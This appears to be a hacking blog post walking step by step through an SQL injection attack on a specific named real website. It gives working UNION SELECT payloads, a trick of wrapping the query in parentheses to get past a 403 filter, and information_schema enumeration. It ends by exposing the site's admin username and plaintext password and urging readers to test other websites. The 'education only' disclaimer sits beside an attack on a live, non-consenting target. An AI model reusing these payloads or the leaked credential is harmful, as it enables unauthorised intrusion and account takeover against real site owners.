SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT.



Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS





http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......


don't worry here the solution

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


done... now is ok again ..but not show the f**k column vulnerable...

only add ---> - <---

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4​,25)--+-


well now show columns 6 and 7

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

done luck today in the first table ---admin is Admin Meh ok next

change the 0 by LIMIT to 1

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....



########## this show username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

done here the username but continue searching for the pass .....change it for 2 and 3 etc ...


########### this show password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

well username and password by admin

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++++++++
+++++++++++++++++

now dump dates ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "admin" ) = username = admin) ###



now column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done..Enjoy testing others Websites.



REMEMBER

Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương